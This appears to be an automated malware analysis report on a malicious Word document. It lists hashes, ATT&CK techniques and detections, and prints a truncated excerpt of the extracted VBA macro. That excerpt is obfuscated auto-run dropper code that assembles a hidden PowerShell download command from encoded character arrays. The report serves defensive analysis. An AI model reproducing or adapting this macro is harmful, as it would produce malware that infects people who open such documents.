Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 36b5f2dc6a15ea9c…

MALICIOUS

Office (OLE)

105.0 KB Created: 2018-06-19 15:29:00 Authoring application: Microsoft Office Word First seen: 2019-05-10
MD5: 717cb62cf0c79938e30095b03958edd8 SHA-1: 7c804a1e042a127e70abe39c7fe7c2df4563dc09 SHA-256: 36b5f2dc6a15ea9c075d0a7fdcbb6dee5ec09dd34a76205aff8a1fac4ed8c54a
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function that uses the Shell() function. This macro constructs and executes a PowerShell command to download a payload from a hardcoded URL. The ClamAV detection 'Doc.Dropper.Agent-6584881-0' further supports the dropper functionality.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6584812-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6584812-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13826 bytes
SHA-256: 7fdda5e5f40cdabf9c2afad13f47fa24b89bd6e6f4dba5ffe298def8d4f186eb
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "EIaGwYfKOGT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "tHdFDPXN"
Function tbACDZ()
On Error Resume Next
jUwls = 46737
HZGfzZ = CByte(htZako)
CIjWt = CDate(66407)
MoUnJQ = CDate(IWzzhX + Sin(92551 + 13705) * 13398 * CInt(77758))
wpAvk = 73305
jJSlwm = uphLO
EnTmLWfwTDC = "OwerSHell  & (" + "(gV '*MdR*')" + ".NAME[3," + "11,2]-" + "JoiN" + "'')( (( 30, 80" + ", 86 ,89 ,8" + "4 ,123 , 105 , " + "26 , 7, 26,"
nIRZXZ = 51099
QQvCv = CByte(NZVash)
OawzH = CDate(69601)
sXAWU = CDate(GXrsNW + Sin(22734 + 30782) * 58150 * CInt(47859))
cQpZK = 87468
JTmlQf = sEVZi
zzbNui = "84,95 ," + "77 ,23 , 8" + "5 , 88 , 80" + " , 95 "
YhwWp = 64629
MWWFkB = CByte(nnzOb)
fiQbhp = CDate(47809)
zjlFk = CDate(NcVQw + Sin(66631 + 6892) * 15762 * CInt(42190))
pzILO = 80089
QojGoc = KiCluQ
iBsNpH = ",89 , 78 , 2" + "6 , 72 , 9" + "1,84 , 94 " + ", 85 , 87 , " + "1, 30, 109" + " , 98" + ", 64, 108 ,64 " + ", 112, 26 ,7,2" + "6 " + ", 84,9"
zztwLS = 64470
tnXIi = CByte(sJRbV)
aXiXSL = CDate(97432)
zZrtjz = CDate(pmIcJ + Sin(20081 + 85662) * 79368 * CInt(28054))
jAUGV = 36985
miLwp = ktBJcR
tYlnCmW = "5,77 ,23" + ", " + "85, 88, 80 ,9" + "5, 89"
dckvDX = 18885
MiiiTJ = CByte(dniHjH)
fonYQ = CDate(53248)
pDXWSj = CDate(zPtSh + Sin(72438 + 62958) * 43985 * CInt(51740))
iGiWX = 50393
zMzXjc = kodwv
IwKtZnFEw = ", 78" + ", 26" + " , 10" + "5 ,67,73 , 7"
MBZWf = 45583
pBVTIN = CByte(aDbFIb)
ldFNB = CDate(16453)
LwPJw = CDate(ivmdr + Sin(16889 + 85033) * 46774 * CInt(65877))
XTJiPV = 57262
KoiNE = GQOwB
EhfokT = "8 ," + "95 ,87" + ",20 ,116 " + ", 95 ,78, 20,1"
tbACDZ = EnTmLWfwTDC + zzbNui + iBsNpH + tYlnCmW + IwKtZnFEw + EhfokT
End Function
Function prSPkG()
On Error Resume Next
GJLwL = 59483
wOAjl = CByte(KvYTu)
Iswvw = CDate(27418)
YSUNt = CDate(ufNAc + Sin(69265 + 3631) * 48566 * CInt(72256))
KHONj = 7481
COPQW = YkKUK
oruQKPLUITa = "09, 95,88, 121 " + ", 86, 83,95, 84" + " , " + "78, 1 , 30" + " ,92, 83," + " 105 ," + "113"
wdBGM = 82157
zuvjt = CByte(Xkwhiz)
LujCZM = CDate(49096)
FmPAz = CDate(niBHC + Sin(49121 + 96860) * 29301 * CInt(56351))
jzRDrI = 63194
abYzaK = ilSvDu
jalUE = ", 115, 26, 7 ," + "26, 29 ,82 , 78" + ",78 , 74 , 0 ," + " 21" + " ,21 " + ",77, 77 " + ",77, 20 , " + "89,82"
vSjGvZ = 61393
mwRvc = CByte(nbuvFk)
fXjjC = CDate(51267)
IuXUH = CDate(fGNTPG + Sin(97953 + 25602) * 61730 * CInt(97962))
szcQr = 47763
wWiMpI = CwUPvA
CqYsp = " ," + "91" + ", 87, 88 ,95, 7" + "2 , 73,78 , " + "83 ,"
nkShNb = 61244
lBzYwl = CByte(sqSmaR)
WQKNz = CDate(43182)
Wzoaq = CDate(lQibh + Sin(32540 + 8220) * 21787 * CInt(37971))
WAdJq = 29266
WDlMH = zFwicO
vLvHJNwruR = " 87 ,88 ,95, " + "72,20,89" + ", 85 ,87 ,21,64" + " ,98,7" + "8 , 12" + "1,89,21 , 1" + "22, 82,78" + " ,78 ,74 , 0"
KwGZu = 53919
rEJNz = CByte(znJMJ)
kzibL = CDate(67299)
NHaEH = CDate(wPFYw + Sin(22494 + 33809) * 59608 * CInt(49472))
EcWvqY = 27773
BoRcM = irRzp
AiFoPjKV = " , 21,2" + "1,77 , 77 " + ",77 ,20 " + ", 81 ," + "83 ,72 ,74,83" + ", 89 ,82 ,23,"
QACAD = 74598
PMAsVK = CByte(jnuGKK)
jmIXR = CDate(22565)
BBVtQV = CDate(BmQZZK + Sin(37530 + 58917) * 32926 * CInt(13443))
mbPNLf = 97806
UKvjB = NEfjNu
inoDs = " 73,95, 72 " + ",76 ,83,73," + "11 ,12 ,20" + " ," + "72,79 , 21 "
pEfBd = 63929
AFFVBD = CByte(BhSAkj)
pJnso = CDate(73895)
uFTlIO = CDate(GQiYDb + Sin(7376 + 50872) * 52424 * CInt(85189))
unGzlj = 86556
ZqZivL = SszurI
vWXPovsWd = ", 94, 64, " + "15 ,107,126," + "21 ," + "122,82 " + ", 78, 78 ," + "74 ,0 , 21 , 21"
prSPkG = oruQKPLUITa + jalUE + CqYsp + vLvHJNwruR + AiFoPjKV + inoDs + vWXPovsWd
End Function
Function ZmouZCISDaA()
On Error Resume Next
QvQkch = 9069
PivzP = CByte(YLKIrp)
fLZZj = CDate(15841)
zbpIzk = CDate(dRKiM + Sin(26539 + 69716) * 70230 * CInt(24175))
sZQKo = 85733
JZwOuo = sDSkkr
vYWYswcspY = ", 77 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.